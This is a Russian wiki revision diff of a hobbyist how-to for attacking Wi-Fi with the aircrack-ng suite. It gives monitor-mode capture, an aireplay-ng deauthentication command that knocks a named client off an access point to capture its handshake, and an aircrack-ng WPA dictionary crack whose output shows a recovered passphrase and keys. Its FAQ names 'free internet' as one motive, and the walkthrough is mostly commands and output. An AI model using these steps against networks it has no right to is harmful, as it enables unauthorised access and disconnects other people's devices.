Различия
Здесь показаны различия между двумя версиями данной страницы.
Следующая версия | Предыдущая версия | ||
wiki:wi-fi_sniffing [2012/10/04 19:00] создано - пилится, в процессе |
wiki:wi-fi_sniffing [2014/10/05 21:13] (текущий) [airodump-ng] Не были закрыты одинарные кавычки. Надо открывать и закрывать их. Такке эмпирическим путём было установлено что можно вообще их не использовать. Также можно не вводить полный путь к папке, а использовать сокращение ~/snif, в таком случае ком |
||
---|---|---|---|
Строка 3: | Строка 3: | ||
<note tip>Статья не закончена </note> | <note tip>Статья не закончена </note> | ||
- | FAQ: | + | FAQ: <code> |
В:Что такое sniffing? | В:Что такое sniffing? | ||
О:"Прослушивание" канала и отлавливание пакетов их сети. | О:"Прослушивание" канала и отлавливание пакетов их сети. | ||
Строка 9: | Строка 9: | ||
В:Зачем это? | В:Зачем это? | ||
O:Для опыта, развлечения, бесплатного интернета, драйва, много зачем, я думаю если бы у вас не было причин, вы бы не читали этого. | O:Для опыта, развлечения, бесплатного интернета, драйва, много зачем, я думаю если бы у вас не было причин, вы бы не читали этого. | ||
+ | </code> | ||
**Немного теории** | **Немного теории** | ||
//Я не буду заново изобретать велосипед, статей на эту тему масса, но для меня они были не удовлетворительные и непонятными, потому пишу свой вариант с пояснениями и дословным How-To, буду рад дополнениям и поправкам, так как пишу на основе своих знаний и без большой компетентности и опыта в вопросе// | //Я не буду заново изобретать велосипед, статей на эту тему масса, но для меня они были не удовлетворительные и непонятными, потому пишу свой вариант с пояснениями и дословным How-To, буду рад дополнениям и поправкам, так как пишу на основе своих знаний и без большой компетентности и опыта в вопросе// | ||
Строка 51: | Строка 51: | ||
Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов. | Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов. | ||
mkdir snif | mkdir snif | ||
- | airodump-ng -w '/home/timofey/snif/ mon0 | + | airodump-ng -w '~/snif/' mon0 |
+ | или | ||
+ | airodump-ng -w ~/snif/ mon0 | ||
где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания. {{ :wiki:выделение_004.png?500|}} | где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания. {{ :wiki:выделение_004.png?500|}} | ||
ещё есть ключ --channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал. | ещё есть ключ --channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал. | ||
Строка 65: | Строка 67: | ||
C8:64:C7:53:02:0C - нужная нам точка доступа. | C8:64:C7:53:02:0C - нужная нам точка доступа. | ||
Собственно всё что нас интересует. | Собственно всё что нас интересует. | ||
- | ====aireplay==== | + | ====aireplay-ng==== |
+ | Пакет для хуков, в данном случае он нам понадобится для получения среди пакетов ключей ауентификации. | ||
+ | Создаём новое окно терминала, получаем права суперпользователя и вбиваем | ||
+ | aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 mon0 | ||
+ | где -0 режим атаки - деаунтефикация. | ||
+ | -а атакуемая точка. | ||
+ | -с клиент который потеряет сеть. | ||
+ | 1000 количество попыток (с какой то попытки человек вылетит из сети насовсем и 100% передаст заново ключи ауентификации) | ||
+ | На практике доказано, что хватает 20-30 пакетов чтобы выбить человека из сети, а 1000 садизм. | ||
+ | Видим в мониторе как у клиента растут переданные пакеты, отлично теперь переходим к заключительной части. | ||
+ | Для всяких извращений курим help | ||
+ | aireplay-ng --help | ||
+ | ====aircrack-ng==== | ||
+ | Теперь заключительная часть, у нас куча данных переданных по сети, огромное количество пакетов (чем больше, тем больше шансов выловить что-то полезное). | ||
+ | aircrack-ng -a 2 -e 'by Inri' -w '/home/timofey/words/my1.txt' '/home/timofey/snif/Inri-02.cap' | ||
+ | Где -a тип ключа 1|WEP 2|WPA/WPA2 | ||
+ | -e название сети | ||
+ | -w путь к файлу с словарём *читал что можно написать *** для того чтобы использовать все доступные словари и прослушанные данные, но не выходит, пишет ошибку. | ||
+ | А последнее путь к файлу с прослушанными пакетами. | ||
+ | Вывод, с 4 попытки подобрал (повторяюсь ключ был известен и вписан в словарь для скорости и 100% вероятности перебора). | ||
+ | <code> | ||
+ | Aircrack-ng 1.1 | ||
+ | |||
+ | |||
+ | [00:00:00] 4 keys tested (415.33 k/s) | ||
+ | |||
+ | |||
+ | KEY FOUND! [ GoodOmens ] | ||
+ | |||
+ | |||
+ | Master Key : CE 25 4A B0 41 BE 0F 4F E4 01 68 AB 07 69 B2 71 | ||
+ | 11 20 52 86 63 BA 4E 17 97 B4 8E 84 69 68 34 0D | ||
+ | |||
+ | Transient Key : 58 40 8D E3 D7 8E A8 DA 89 BC 44 39 37 02 D1 C4 | ||
+ | 16 99 AC C3 93 3E DF 52 AC C4 3E C5 DF C3 CD DF | ||
+ | 7B 6F C8 3E E8 B0 F8 AA 16 C1 0C 69 2F 94 47 3A | ||
+ | 1B 90 EF 22 59 60 34 B2 96 11 A5 FB 5B F7 21 F2 | ||
+ | |||
+ | EAPOL HMAC : DA C6 09 55 6D E8 0E D0 97 25 96 F6 F7 53 D7 7F | ||
+ | </code> | ||
===== Ссылки ===== | ===== Ссылки ===== | ||
* [[FIXME]] | * [[FIXME]] | ||
- | {{tag>wi-fi_sniffing}} | + | {{tag>wi-fi sniffing aircrack-ng}} |
+ | |||
+ | --- [[user>nefelim4ag]] //2012/10/04 19:50// |